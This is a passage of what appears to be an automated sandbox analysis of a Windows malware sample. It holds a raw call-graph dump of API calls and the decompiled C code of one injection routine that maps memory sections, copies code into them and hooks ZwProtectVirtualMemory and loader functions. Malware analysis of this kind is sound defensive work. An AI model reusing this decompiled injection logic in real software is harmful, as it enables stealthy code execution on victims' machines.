402541 GetModuleFileNameA 3199->3200 3201 401cb5 3199->3201 3202 402572 3200->3202 3203 402553 3200->3203 3201->3187 3201->3188 3202->3201 3205 402584 GetLastError 3202->3205 3208 40257d 3202->3208 3203->3200 3203->3202 3211 40105b HeapFree 3203->3211 3212 401046 HeapAlloc 3203->3212 3213 40105b HeapFree 3205->3213 3208->3201 3209->3187 3210->3199 3211->3203 3212->3203 3213->3208 3214->3161 3216 4021c6 3215->3216 3217 40228a 3215->3217 3266 402603 3216->3266 3245 12ae040 3217->3245 3251 12ae018 3217->3251 3257 12a1129 3217->3257 3220 40229d GetLastError 3221 4022a6 3220->3221 3221->3170 3224 4021fb memcpy 3225 40223d 3224->3225 3274 4025c0 3225->3274 3228 402285 3228->3220 3228->3221 3229 40227e RtlNtStatusToDosError 3229->3228 3617 401fbb 3233->3617 3236 402603 2 API calls 3237 402099 3236->3237 3238 4020a1 GetLastError 3237->3238 3241 4020ac 3237->3241 3243 402125 3238->3243 3239 4020d6 3239->3170 3240 40217f GetLastError 3240->3239 3241->3239 3242 4025c0 2 API calls 3241->3242 3242->3243 3243->3239 3243->3240 3244->3162 3247 12ae25c 3245->3247 3250 12ae05f 3245->3250 3246 12ae1bc NtProtectVirtualMemory 3246->3247 3248 12ae1ee 3246->3248 3247->3228 3248->3247 3249 12ae22d NtProtectVirtualMemory 3248->3249 3249->3247 3249->3248 3250->3246 3250->3247 3256 12ae042 3251->3256 3252 12ae1bc NtProtectVirtualMemory 3253 12ae25c 3252->3253 3254 12ae1ee 3252->3254 3253->3228 3254->3253 3255 12ae22d NtProtectVirtualMemory 3254->3255 3255->3253 3255->3254 3256->3252 3256->3253 3258 12a1159 InterlockedDecrement 3257->3258 3259 12a1136 3257->3259 3261 12a1151 3258->3261 3262 12a1168 3258->3262 3260 12a1139 InterlockedIncrement 3259->3260 3259->3261 3260->3261 3263 12a1148 3260->3263 3261->3228 3290 12a10d5 3262->3290 3278 12a102a HeapCreate 3263->3278 3267 4021d7 3266->3267 3268 402615 3266->3268 3267->3220 3270 40259f 3267->3270 3268->3267 3269 40263a RtlNtStatusToDosError SetLastError 3268->3269 3269->3267 3271 4025ac RtlNtStatusToDosError 3270->3271 3272 4021f0 3270->3272 3271->3272 3272->3224 3272->3228 3275 4025cc 3274->3275 3276 4025ef RtlNtStatusToDosError SetLastError 3275->3276 3277 402260 3275->3277 3276->3277 3277->3221 3277->3228 3277->3229 3279 12a104e GetTickCount 3278->3279 3280 12a1046 3278->3280 3299 12a3887 CreateEventA 3279->3299 3280->3261 3285 12a10a9 3287 12a10b8 3285->3287 3288 12a10ad IsWow64Process 3285->3288 3286 12a1084 GetModuleHandleA GetProcAddress 3286->3285 3286->3287 3314 12a1e67 3287->3314 3288->3287 3291 12a10de SetEvent 3290->3291 3292 12a1126 3290->3292 3293 12a10eb SleepEx 3291->3293 3292->3261 3294 12a10fe 3293->3294 3295 12a1105 3293->3295 3294->3293 3294->3295 3296 12a110f CloseHandle 3295->3296 3297 12a1116 3295->3297 3296->3297 3297->3292 3298 12a111f HeapDestroy 3297->3298 3298->3292 3300 12a389e GetVersion 3299->3300 3301 12a38f1 GetLastError 3299->3301 3302 12a38a8 3300->3302 3303 12a1061 3301->3303 3304 12a38b0 GetCurrentProcessId OpenProcess 3302->3304 3305 12a38e1 3302->3305 3303->3280 3306 12a39eb lstrcpyn 3303->3306 3304->3305 3305->3303 3307 12a3a2c 3306->3307 3308 12a106d 3307->3308 3309 12a3a64 VirtualAlloc 3307->3309 3308->3280 3308->3285 3308->3286 3309->3308 3310 12a3a94 3309->3310 3311 12a3aca memcpy 3310->3311 3312 12a3adb 3310->3312 3313 12a3ae2 VirtualFree 3311->3313 3312->3313 3313->3308 3329 12a3b68 NtOpenProcess 3314->3329 3318 12a1ed6 3319 12a1f0a 3318->3319 3320 12a1edf memset RtlInitializeCriticalSection 3318->3320 3328 12a1ebb 3319->3328 3342 12a44a2 3319->3342 3320->3319 3324 12a1f20 3325 12a1f26 CoInitializeEx 3324->3325 3324->3328 3326 12a1f35 3325->3326 3326->3328 3369 12a1cce CreateWaitableTimerA 3326->3369 3328->3280 3330 12a1e91 3329->3330 3331 12a3bb9 NtOpenProcessToken 3329->3331 3330->3328 3341 12a1000 RtlAllocateHeap 3330->3341 3332 12a3bcc NtQueryInformationToken 3331->3332 3333 12a3c21 NtClose 3331->3333 3387 12a1000 RtlAllocateHeap 3332->3387 3333->3330 3335 12a3be8 3336 12a3bee NtQueryInformationToken 3335->3336 3337 12a3c17 NtClose 3335->3337 3338 12a3c11 3336->3338 3339 12a3c01 memcpy 3336->3339 3337->3333 3388 12a1015 HeapFree 3338->3388 3339->3338 3341->3318 3343 12a44c1 3342->3343 3344 12a4516 GetComputerNameW 3343->3344 3345 12a44d5 RtlAllocateHeap 3343->3345 3346 12a452b RtlAllocateHeap 3344->3346 3347 12a1f1b 3344->3347 3345->3344 3351 12a44ec 3345->3351 3346->3347 3348 12a4541 GetComputerNameW 3346->3348 3353 12a1173 3347->3353 3349 12a455f HeapFree 3348->3349 3350 12a4550 3348->3350 3349->3347 3350->3349 3352 12a4506 HeapFree 3351->3352 3352->3344 3389 12a3f5e 3353->3389 3356 12a3f5e 3 API calls 3358 12a11b4 3356->3358 3357 12a1343 3357->3324 3358->3357 3362 12a12f5 3358->3362 3396 12a433c lstrlen 3358->3396 3361 12a12ef 3402 12a46ae RtlEnterCriticalSection 3361->3402 3363 12a132e HeapFree 3362->3363 3365 12a433c 4 API calls 3362->3365 3363->3324 3366 12a131b 3365->3366 3366->3363 3367 12a131f 3366->3367 3408 12a4590 RtlEnterCriticalSection 3367->3408 3370 12a1d01 3369->3370 3371 12a1e56 GetLastError 3369->3371 3373 12a1d31 WaitForMultipleObjects 3370->3373 3372 12a1e5e 3371->3372 3372->3328 3374 12a1d50 3373->3374 3385 12a1dab 3373->3385 3427 12a1c40 3374->3427 3376 12a1db7 HeapFree 3376->3385 3377 12a1dcb CloseHandle 3377->3372 3379 12a1d55 3380 12a1da2 3379->3380 3381 12a1dea 3379->3381 3382 12a1e1b _allmul 3379->3382 3379->3385 3440 12a1b3f RtlAllocateHeap 3379->3440 3450 12a19e0 3380->3450 3381->3382 3481 12a45f0 RtlEnterCriticalSection 3381->3481 3386 12a1e37 WaitForMultipleObjects 3382->3386 3385->3376 3385->3377 3386->3379 3386->3385 3387->3335 3388->3337 3394 12a3f99 3389->3394 3391 12a4011 3392 12a403f memcpy 3391->3392 3393 12a1190 3391->3393 3392->3393 3393->3356 3394->3391 3394->3393 3416 12a1000 RtlAllocateHeap 3394->3416 3417 12a1015 HeapFree 3394->3417 3397 12a4351 3396->3397 3418 12a1000 RtlAllocateHeap 3397->3418 3399 12a435c 3400 12a12eb 3399->3400 3401 12a4362 memcpy memset 3399->3401 3400->3361 3400->3362 3401->3400 3403 12a46c7 3402->3403 3404 12a46bf Sleep 3403->3404 3406 12a46d3 3403->3406 3404->3403 3405 12a46fa RtlLeaveCriticalSection 3405->3362 3406->3405 3407 12a46e6 HeapFree 3406->3407 3407->3405 3409 12a45a9 3408->3409 3410 12a45a1 Sleep 3409->3410 3411 12a45b5 3409->3411 3410->3409 3412 12a45d1 3411->3412 3413 12a45c2 HeapFree 3411->3413 3419 12a4420 3412->3419 3413->3412 3416->3394 3417->3394 3418->3399 3420 12a4435 3419->3420 3421 12a1000 RtlAllocateHeap 3420->3421 3422 12a444b 3421->3422 3423 12a4453 StrTrimA 3422->3423 3424 12a448a RtlLeaveCriticalSection 3422->3424 3425 12a4461 3423->3425 3424->3363 3425->3424 3426 12a446c StrTrimA 3425->3426 3426->3425 3486 12a2629 3427->3486 3430 12a1cc8 3430->3379 3433 12a1c6c GetModuleHandleA 3434 12a1c7b 3433->3434 3437 12a1c95 3433->3437 3436 12a1bc6 11 API calls 3434->3436 3434->3437 3436->3437 3503 12a2544 SysAllocString 3437->3503 3441 12a1b5e 3440->3441 3442 12a1b6f 3440->3442 3509 12a4a4e 3441->3509 3444 12a1bb3 3442->3444 3543 12a49c1 3442->3543 3444->3379 3447 12a1b8a 3448 12a45f0 3 API calls 3447->3448 3449 12a1ba2 HeapFree 3448->3449 3449->3444 3555 12a1348 3450->3555 3455 12a1a21 3604 12a1000 RtlAllocateHeap 3455->3604 3456 12a1a3d 3575 12a18f4 3456->3575 3457 12a1a54 3459 12a18f4 4 API calls 3457->3459 3462 12a1a45 3459->3462 3461 12a1b10 3472 12a20aa 4 API calls 3461->3472 3474 12a1a02 3461->3474 3462->3455 3583 12a15ad 3462->3583 3463 12a1ab3 3463->3461 3465 12a1b0a 3463->3465 3466 12a1ad0 lstrlenW 3463->3466 3616 12a1015 HeapFree 3465->3616 3605 12a1000 RtlAllocateHeap 3466->3605 3470 12a1ae1 3470->3465 3606 12a20aa 3470->3606 3471 12a2629 4 API calls 3473 12a1a82 3471->3473 3472->3474 3473->3455 3592 12a41a7 3473->3592 3474->3385 3482 12a4609 3481->3482 3483 12a4601 Sleep 3482->3483 3485 12a4615 RtlLeaveCriticalSection 3482->3485 3483->3482 3485->3381 3487 12a1000 RtlAllocateHeap 3486->3487 3488 12a2635 3487->3488 3489 12a1c50 3488->3489 3490 12a21c4 CoCreateInstance CoSetProxyBlanket 3488->3490 3489->3430 3493 12a1bc6 3489->3493 3492 12a2641 3490->3492 3491 12a1015 HeapFree 3491->3489 3492->3489 3492->3491 3494 12a4387 RtlAllocateHeap lstrlen mbstowcs memset 3493->3494 3495 12a1bd9 3494->3495 3496 12a24fe SysFreeString SysFreeString 3495->3496 3497 12a1c34 3495->3497 3498 12a1bf2 3496->3498 3497->3433 3497->3437 3499 12a1bf8 GetSystemTimeAsFileTime 3498->3499 3500 12a1c23 HeapFree 3498->3500 3501 12a25a8 SysFreeString SysFreeString SafeArrayCreate memcpy SafeArrayDestroy 3499->3501 3500->3497 3502 12a1c21 3501->3502 3502->3500 3504 12a256a 3503->3504 3505 12a1cb1 3503->3505 3506 12a2371 SysFreeString SysFreeString 3504->3506 3508 12a1015 HeapFree 3505->3508 3507 12a2592 SysFreeString 3506->3507 3507->3505 3508->3430 3510 12a4a68 RtlQueryPerformanceFrequency RtlQueryPerformanceCounter _aulldiv 3509->3510 3512 12a4ae6 3510->3512 3513 12a4642 9 API calls 3512->3513 3514 12a4afc 3513->3514 3515 12a4b09 RtlAllocateHeap 3514->3515 3516 12a4cdf HeapFree 3514->3516 3517 12a4b28 3515->3517 3518 12a4ccf HeapFree 3515->3518 3516->3442 3519 12a4b2f RtlEnterCriticalSection RtlLeaveCriticalSection 3517->3519 3518->3516 3520 12a491d 14 API calls 3519->3520 3521 12a4b6b 3520->3521 3522 12a4cc1 HeapFree 3521->3522 3523 12a4b87 StrTrimA 3521->3523 3522->3518 3524 12a42f8 RtlAllocateHeap lstrcpy lstrcat 3523->3524 3526 12a4b99 3524->3526 3525 12a4cb3 HeapFree 3525->3522 3526->3525 3527 12a4387 RtlAllocateHeap lstrlen mbstowcs memset 3526->3527 3528 12a4bd0 3527->3528 3529 12a4c72 3528->3529 3530 12a5103 RtlAllocateHeap HeapFree CoCreateInstance 3528->3530 3531 12a4ca0 HeapFree 3529->3531 3533 12a4c8d 3529->3533 3532 12a4be4 3530->3532 3531->3525 3534 12a4c2c 3532->3534 3536 12a4f8d 15 API calls 3532->3536 3535 12a45f0 RtlEnterCriticalSection Sleep RtlLeaveCriticalSection 3533->3535 3537 12a4c65 3534->3537 3539 12a4c4c wcstombs 3534->3539 3535->3531 3538 12a4bfd 3536->3538 3540 12a1015 HeapFree 3537->3540 3542 12a1015 HeapFree 3538->3542 3541 12a54f6 memcpy 3539->3541 3540->3529 3541->3537 3542->3534 3544 12a1000 RtlAllocateHeap 3543->3544 3545 12a49d5 3544->3545 3546 12a49db memcpy 3545->3546 3547 12a1b86 3545->3547 3548 12a49f4 3546->3548 3547->3444 3547->3447 3549 12a52e2 26 API calls 3548->3549 3550 12a4a10 memset 3549->3550 3551 12a1015 HeapFree 3550->3551 3552 12a4a24 3551->3552 3552->3547 3553 12a4a28 memcpy 3552->3553 3554 12a1015 HeapFree 3553->3554 3554->3547 3556 12a3ed0 19 API calls 3555->3556 3557 12a136a 3556->3557 3558 12a1000 RtlAllocateHeap 3557->3558 3562 12a1409 3557->3562 3559 12a1384 3558->3559 3560 12a138a wsprintfA lstrlen 3559->3560 3559->3562 3561 12a1000 RtlAllocateHeap 3560->3561 3563 12a13ea 3561->3563 3562->3474 3567 12a3922 3562->3567 3564 12a1403 3563->3564 3565 12a13f0 lstrcpy lstrcat 3563->3565 3566 12a1015 HeapFree 3564->3566 3565->3564 3566->3562 3568 12a1a13 3567->3568 3569 12a3943 3567->3569 3568->3455 3568->3456 3568->3457 3569->3568 3570 12a39d1 CloseHandle 3569->3570 3571 12a1000 RtlAllocateHeap 3569->3571 3570->3568 3573 12a3994 3571->3573 3572 12a39d0 3572->3570 3573->3572 3574 12a1015 HeapFree 3573->3574 3574->3572 3576 12a191a 3575->3576 3577 12a19c4 3576->3577 3578 12a1000 RtlAllocateHeap 3576->3578 3577->3462 3579 12a1960 3578->3579 3579->3577 3580 12a1966 memset memcpy 3579->3580 3580->3577 3581 12a198f 3580->3581 3581->3577 3582 12a19a7 memcpy 3581->3582 3582->3581 3584 12a15bd 3583->3584 3585 12a161f 3583->3585 3584->3585 3586 12a407c lstrcmp lstrlen 3584->3586 3585->3455 3585->3471 3587 12a15c9 3586->3587 3587->3585 3588 12a150b RtlAllocateHeap 3587->3588 3589 12a15ee 3588->3589 3589->3585 3590 12a1422 6 API calls 3589->3590 3591 12a160a HeapFree 3590->3591 3591->3585 3593 12a41d3 3592->3593 3594 12a1a91 3593->3594 3595 12a1000 RtlAllocateHeap 3593->3595 3603 12a1015 HeapFree 3594->3603 3596 12a41ec 3595->3596 3596->3594 3597 12a4253 3596->3597 3598 12a174a 22 API calls 3596->3598 3600 12a427a WaitForSingleObject 3596->3600 3601 12a1015 HeapFree 3596->3601 3602 12a1000 RtlAllocateHeap 3596->3602 3599 12a1015 HeapFree 3597->3599 3598->3596 3599->3594 3600->3596 3600->3597 3601->3596 3602->3596 3603->3455 3604->3463 3605->3470 3607 12a1f62 CoCreateInstance 3606->3607 3614 12a20da 3607->3614 3608 12a1b04 3615 12a1015 HeapFree 3608->3615 3609 12a218d 3611 12a219b 3609->3611 3612 12a2192 SysFreeString 3609->3612 3610 12a2184 SysFreeString 3610->3609 3611->3608 3613 12a21a0 SysFreeString 3611->3613 3612->3611 3613->3608 3614->3608 3614->3609 3614->3610 3615->3465 3616->3461 3618 40202a memcpy 3617->3618 3619 401fc9 3617->3619 3618->3236 3627 40244e 3619->3627 3621 401fd9 3622 40244e 16 API calls 3621->3622 3623 401ff4 3622->3623 3624 40244e 16 API calls 3623->3624 3625 40200f 3624->3625 3626 40244e 16 API calls 3625->3626 3626->3618 3628 40245a 3627->3628 3639 40231b 3628->3639 3631 40247f VirtualAlloc 3634 402497 3631->3634 3638 4024db 3631->3638 3632 402519 3632->3621 3633 40250a VirtualFree 3633->3632 3636 4024cb 3634->3636 3652 401d4b 3634->3652 3637 4027db 2 API calls 3636->3637 3637->3638 3638->3632 3638->3633 3655 401d9f GetProcAddress 3639->3655 3642 402360 3643 401d9f 5 API calls 3642->3643 3646 40239e 3642->3646 3647 40237e VirtualFree VirtualAlloc 3642->3647 3643->3642 3644 402440 3644->3631 3644->3638 3645 402432 VirtualFree 3645->3644 3648 4023bf lstrcmpiA 3646->3648 3651 402401 3646->3651 3647->3642 3647->3646 3649 4023d3 StrChrA 3648->3649 3648->3651 3649->3646 3650 4023e0 lstrcmpiA 3649->3650 3650->3646 3650->3651 3651->3644 3651->3645 3653 401d62 GetProcAddress 3652->3653 3654 401d7c 3652->3654 3653->3654 3654->3634 3656 401dcb 3655->3656 3657 401f98 VirtualAlloc 3655->3657 3656->3657 3672 401046 HeapAlloc 3656->3672 3657->3642 3657->3651 3659 401ded 3659->3657 3673 401046 HeapAlloc 3659->3673 3661 401e02 3662 401f77 3661->3662 3663 401d4b GetProcAddress 3661->3663 3674 40105b HeapFree 3662->3674 3665 401e1a 3663->3665 3665->3662 3668 401d4b GetProcAddress 3665->3668 3666 401f8e 3666->3657 3675 40105b HeapFree 3666->3675 3670 401e36 3668->3670 3669 401d4b GetProcAddress 3669->3670 3670->3662 3670->3669 3671 401f36 StrRChrA 3670->3671 3671->3670 3672->3659 3673->3661 3674->3666 3675->3657 3676 12a8eaa 3677 12a8e76 3676->3677 3679 12a877b 3677->3679 3680 12a87e2 RaiseException 3679->3680 3681 12a8801 3679->3681 3683 12a898f 3680->3683 3682 12a886e LoadLibraryA 3681->3682 3681->3683 3684 12a88be InterlockedExchange 3681->3684 3686 12a88e0 3681->3686 3682->3684 3685 12a887d GetLastError 3682->3685 3683->3677 3689 12a88cc 3684->3689 3690 12a88f2 FreeLibrary 3684->3690 3688 12a889d RaiseException 3685->3688 3693 12a888f 3685->3693 3686->3683 3687 12a8944 GetProcAddress 3686->3687 3687->3683 3691 12a8954 GetLastError 3687->3691 3688->3683 3689->3686 3692 12a88d2 LocalAlloc 3689->3692 3690->3686 3694 12a8966 3691->3694 3692->3686 3693->3684 3693->3688 3694->3683 3695 12a8974 RaiseException 3694->3695 3695->3683 3776 402d80 3777 402d9e 3776->3777 3779 402e34 __except_handler3 3776->3779 3778 402f99 __except_handler3 NtQueryVirtualMemory 3777->3778 3781 402db9 __except_handler3 3778->3781 3780 402e84 __except_handler3 RtlUnwind 3780->3781 3781->3779 3781->3780 3785 12a89e7 3786 12a89c2 3785->3786 3786->3785 3787 12a877b ___delayLoadHelper2@8 10 API calls 3786->3787 3787->3786 3696 12ae439 3697 12ae451 GetModuleHandleA GetProcAddress 3696->3697 3698 12ae476 3696->3698 3697->3698 3702 12a89bd 3703 12a89c2 3702->3703 3704 12a877b ___delayLoadHelper2@8 10 API calls 3703->3704 3704->3703 3711 12ae30b lstrcpyn 3713 12ae350 3711->3713 3712 12ae416 3713->3712 3714 12ae388 VirtualAlloc 3713->3714 3714->3712 3715 12ae3b8 3714->3715 3716 12ae406 VirtualFree 3715->3716 3716->3712 3717 12ae58e GetProcAddress 3718 12ae5ba 3717->3718 3722 12ae766 3717->3722 3718->3722 3726 12ae53a 3718->3726 3721 12ae53a GetProcAddress 3724 12ae625 3721->3724 3723 12ae53a GetProcAddress 3723->3724 3724->3722 3724->3723 3725 12ae725 StrRChrA 3724->3725 3725->3724 3727 12ae56b 3726->3727 3728 12ae551 GetProcAddress 3726->3728 3727->3721 3727->3722 3728->3727 3729 12ae48e 3731 12ae4a4 3729->3731 3730 12ae529 3731->3730 3732 12ae4cb CreateFileA 3731->3732 3732->3730 3733 12ae4ec SetFilePointer 3732->3733 3734 12ae4fa ReadFile 3733->3734 3735 12ae520 CloseHandle 3733->3735 3734->3735 3736 12ae512 3734->3736 3735->3730 3736->3735 3797 12a875f 3798 12a8764 3797->3798 3799 12a877b ___delayLoadHelper2@8 10 API calls 3798->3799 3800 12a8771 3799->3800 3747 402d78 3748 402d80 3747->3748 3750 402e34 __except_handler3 3748->3750 3753 402f99 3748->3753 3752 402db9 __except_handler3 3752->3750 3757 402e84 RtlUnwind 3752->3757 3754 402fae 3753->3754 3756 402fca 3753->3756 3755 403039 NtQueryVirtualMemory 3754->3755 3754->3756 3755->3756 3756->3752 3756->3756 3758 402e9c 3757->3758 3758->3752 3759 4024f9 3760 402503 3759->3760 3761 40250a VirtualFree 3760->3761 3762 402519 3760->3762 3761->3762 3769 12ae297 CreateEventA 3770 12ae304 GetLastError 3769->3770 3771 12ae2b5 GetVersion 3769->3771 3772 12ae2bf 3771->3772 3773 12ae2c7 GetCurrentProcessId OpenProcess 3772->3773 3774 12ae2ff 3772->3774 3775 12ae2f4 3773->3775

    Executed Functions

    Function 0040134B, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 195native

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 56 40134b-401371 57 401373-40137a 56->57 58 40138e-401396 56->58 57->58 59 40137c-40138c 57->59 60 401399-40139e 58->60 59->60 61 4013a0-4013a7 60->61 62 4013ac-4013b1 60->62 63 40159d-4015a3 61->63 64 4013b3-4013c2 call 401046 62->64 65 4013e9-40141f call 4015e5 62->65 70 4013d0-4013e7 call 402989 64->70 71 4013c4-4013cb 64->71 72 401425-40144f call 4015a6 65->72 73 401558-40155c 65->73 70->65 74 40157f-401583 71->74 72->73 84 401455-401468 call 4016a4 72->84 76 401570-401574 73->76 77 40155e-40156a NtUnmapViewOfSection RtlNtStatusToDosError 73->77 74->63 81 401585-401598 memset call 40105b 74->81 76->74 80 401576-401579 CloseHandle 76->80 77->76 80->74 81->63 84->73 87 40146e-401473 84->87 88 401481-401486 87->88 89 401475-40147e memcpy 87->89 90 4014b1-4014d4 memcpy 88->90 91 401488-40148e 88->91 89->88 93 4014d6-4014e4 90->93 94 4014e7-4014eb 90->94 91->90 92 401490 91->92 95 401495-4014af 92->95 93->94 96 401503-401507 94->96 97 4014ed-401500 94->97 95->90 98 401492 95->98 99 401509-401510 96->99 100 40151f-401520 call 401203 96->100 97->96 98->95 99->100 101 401512-40151d call 4012ac 99->101 104 401525-40152a 100->104 101->104 104->73 105 40152c-401550 memcpy call 4022ad 104->105 108 401555 105->108 108->73
    C-Code - Quality: 95%
    			E0040134B(void* __esi, intOrPtr* _a4, signed int _a8) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				int _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				signed int _v44;
				signed int _t96;
				int _t98;
				intOrPtr _t104;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t115;
				unsigned int _t116;
				intOrPtr _t121;
				intOrPtr _t124;
				unsigned int _t131;
				signed int _t133;
				signed int _t139;
				void* _t142;
				void* _t143;
				void* _t146;
				intOrPtr _t154;
				void* _t155;
				signed int _t158;
				void* _t161;
				void* _t162;

				_t161 = __esi;
				_t96 = _a8 & 0x00000010;
				_v32 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v36 = E00401851;
				_v44 = _t96;
				if(_t96 != 0 || ( *0x405480 & 0x00000001) == 0) {
					_v20 =  *_t161;
					_t98 =  *(_t161 + 0x10);
					_t155 = _v20;
				} else {
					_t155 =  *(__esi + 8);
					_t98 =  *(__esi + 0x14);
					_v36 =  &E00405070;
					_v20 = _t155;
				}
				_v28 = _t98;
				if(_t155 != 0) {
					if( *_t155 == 0x5a4d) {
						L10:
						_t158 =  *((intOrPtr*)( *((intOrPtr*)(_t155 + 0x3c)) + _t155 + 0x50)) + 0x00000fff & 0xfffff000;
						_t104 = E004015E5( *(_t161 + 0x14) + _t158 +  *(_t161 + 0x10) + 0xc50,  &_v16,  &_v24); // executed
						_v8 = _t104;
						if(_t104 != 0) {
							L30:
							if(_v16 != 0) {
								RtlNtStatusToDosError(NtUnmapViewOfSection(0xffffffff, _v16));
							}
							if(_v24 != 0) {
								CloseHandle(_v24);
							}
							L34:
							if(_v32 != 0) {
								memset(_v32, 0, _v28);
								E0040105B(_v32);
							}
							goto L36;
						}
						_t139 =  *0x405498; // 0x736c6e70
						_t142 = (_t139 ^ 0x736c6220) + _t158 + _v16;
						_v40 = _t142;
						_t113 = E004015A6(_v24,  *_a4,  &_v12); // executed
						_v8 = _t113;
						if(_t113 != 0) {
							goto L30;
						}
						_t114 = E004016A4(_v16, _v20, _v12);
						_v8 = _t114;
						if(_t114 != 0) {
							goto L30;
						}
						_t115 =  *(_t161 + 0x10);
						if(_t115 != 0) {
							memcpy(_t142,  *_t161, _t115);
							_t162 = _t162 + 0xc;
						}
						_t116 =  *(_t161 + 0x14);
						if(_t116 == 0) {
							L20:
							_t143 = _v16 + _t158;
							asm("cdq");
							 *((intOrPtr*)(_t143 + 0x30)) = _v12;
							 *((intOrPtr*)(_t143 + 0x34)) = _t154;
							memcpy(_t143 + 0x18, _t161, 0x18);
							_t162 = _t162 + 0xc;
							if( *(_t161 + 0x10) != 0) {
								asm("cdq");
								 *(_t143 + 0x18) = _t158 + _v12 + 0xc50;
								 *((intOrPtr*)(_t143 + 0x1c)) = _t154;
							}
							if( *(_t161 + 0x14) != 0) {
								asm("cdq");
								 *((intOrPtr*)(_t143 + 0x20)) = _v12 + _t158 +  *(_t161 + 0x10) + 0xc50;
								 *((intOrPtr*)(_t143 + 0x24)) = _t154;
							}
							if(_v44 != 0 || ( *0x405480 & 0x00000001) == 0) {
								_t121 = E00401203(_t154, _t143);
							} else {
								_push( *_a4);
								_t121 = E004012AC(_t154, _t143);
							}
							_v8 = _t121;
							if(_t121 == 0) {
								memcpy(_t143 + 0x40, _v36, 0x800);
								_t162 = _t162 + 0xc;
								_t124 = E004022AD(_t154, _a4, _t158 + _v12 + 0x40, _t158 + _v12, _a8); // executed
								_v8 = _t124;
							}
							goto L30;
						} else {
							_t131 = _t116 >> 2;
							_v20 = _t131;
							if(_t131 == 0) {
								goto L20;
							}
							while(1) {
								_t133 = _v20 << 2;
								_t49 =  &_v20;
								 *_t49 = _v20 - 1;
								_t154 = _t142 + _t133;
								 *((intOrPtr*)(_t154 +  *(_t161 + 0x10) - 4)) =  *((intOrPtr*)(_t133 +  *((intOrPtr*)(_t161 + 8)) - 4));
								if( *_t49 == 0) {
									goto L20;
								}
								_t142 = _v40;
							}
							goto L20;
						}
					}
					_t146 = E00401046(_v28);
					_v32 = _t146;
					if(_t146 != 0) {
						E00402989(_t146, _t155, _v28,  *0x405494, 0);
						_v20 = _t146;
						_t155 = _t146;
						goto L10;
					} else {
						_v8 = 8;
						goto L34;
					}
				} else {
					_v8 = 2;
					L36:
					return _v8;
				}
			}

































    0x0040134b
    0x00401357
    0x0040135b
    0x0040135e
    0x00401361
    0x00401364
    0x00401367
    0x0040136e
    0x00401371
    0x00401390
    0x00401393
    0x00401396
    0x0040137c
    0x0040137c
    0x0040137f
    0x00401382
    0x00401389
    0x00401389
    0x0040139b
    0x0040139e
    0x004013b1
    0x004013e9
    0x004013fd
    0x00401415
    0x0040141c
    0x0040141f
    0x00401558
    0x0040155c
    0x0040156a
    0x0040156a
    0x00401574
    0x00401579
    0x00401579
    0x0040157f
    0x00401583
    0x0040158d
    0x00401598
    0x00401598
    0x00000000
    0x00401583
    0x00401425
    0x0040143f
    0x00401442
    0x00401445
    0x0040144c
    0x0040144f
    0x00000000
    0x00000000
    0x0040145e
    0x00401465
    0x00401468
    0x00000000
    0x00000000
    0x0040146e
    0x00401473
    0x00401479
    0x0040147e
    0x0040147e
    0x00401481
    0x00401486
    0x004014b1
    0x004014b4
    0x004014ba
    0x004014bd
    0x004014c5
    0x004014c8
    0x004014cd
    0x004014d4
    0x004014e0
    0x004014e1
    0x004014e4
    0x004014e4
    0x004014eb
    0x004014fc
    0x004014fd
    0x00401500
    0x00401500
    0x00401507
    0x00401520
    0x00401512
    0x00401515
    0x00401518
    0x00401518
    0x00401527
    0x0040152a
    0x00401538
    0x00401540
    0x00401550
    0x00401555
    0x00401555
    0x00000000
    0x00401488
    0x00401488
    0x0040148b
    0x0040148e
    0x00000000
    0x00000000
    0x00401495
    0x0040149b
    0x0040149e
    0x0040149e
    0x004014a1
    0x004014ab
    0x004014af
    0x00000000
    0x00000000
    0x00401492
    0x00401492
    0x00000000
    0x00401495
    0x00401486
    0x004013bb
    0x004013bf
    0x004013c2
    0x004013df
    0x004013e4
    0x004013e7
    0x00000000
    0x004013c4
    0x004013c4
    0x00000000
    0x004013c4
    0x004013a0
    0x004013a0
    0x0040159d
    0x004015a3
    0x004015a3

    APIs
      • Part of subcall function 004015E5: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 00401640
      • Part of subcall function 004015E5: memset.NTDLL ref: 00401665
      • Part of subcall function 004015E5: RtlNtStatusToDosError.NTDLL(00000000), ref: 00401681
      • Part of subcall function 004015E5: ZwClose.NTDLL(?), ref: 00401695
    • memcpy.NTDLL(?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00401479
    • memcpy.NTDLL(?,?,00000018,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 004014C8
      • Part of subcall function 00401203: GetModuleHandleA.KERNEL32(NTDLL.DLL,?,?,00401525,?,?,?,00000000), ref: 00401236
      • Part of subcall function 00401203: memcpy.NTDLL(?,3!Pw,00000018,ZwProtectVirtualMemory,LdrGetProcedureAddress,LdrLoadDll), ref: 0040129D
    • memcpy.NTDLL(?,00401851,00000800,?,?,?,00000000), ref: 00401538
      • Part of subcall function 004022AD: memset.NTDLL ref: 004022CC
      • Part of subcall function 004012AC: memcpy.NTDLL(?,0040545C,00000018,?,ZwProtectVirtualMemory,?,LdrGetProcedureAddress,?,LdrLoadDll,?,0040151D,?,?,?,?,00000000), ref: 0040133D
    • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00401563
    • RtlNtStatusToDosError.NTDLL(00000000), ref: 0040156A
    • CloseHandle.KERNEL32(00000000), ref: 00401579
    • memset.NTDLL ref: 0040158D
      • Part of subcall function 0040105B: HeapFree.KERNEL32(00000000,00000000,0040275E), ref: 00401067
      • Part of subcall function 004015A6: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 004015D3
      • Part of subcall function 004015A6: RtlNtStatusToDosError.NTDLL(00000000), ref: 004015DA
      • Part of subcall function 004016A4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401704
      • Part of subcall function 004016A4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,00000000), ref: 00401719
      • Part of subcall function 004016A4: memcpy.NTDLL(?,?,?,?,?,?,?,?,?), ref: 0040175B
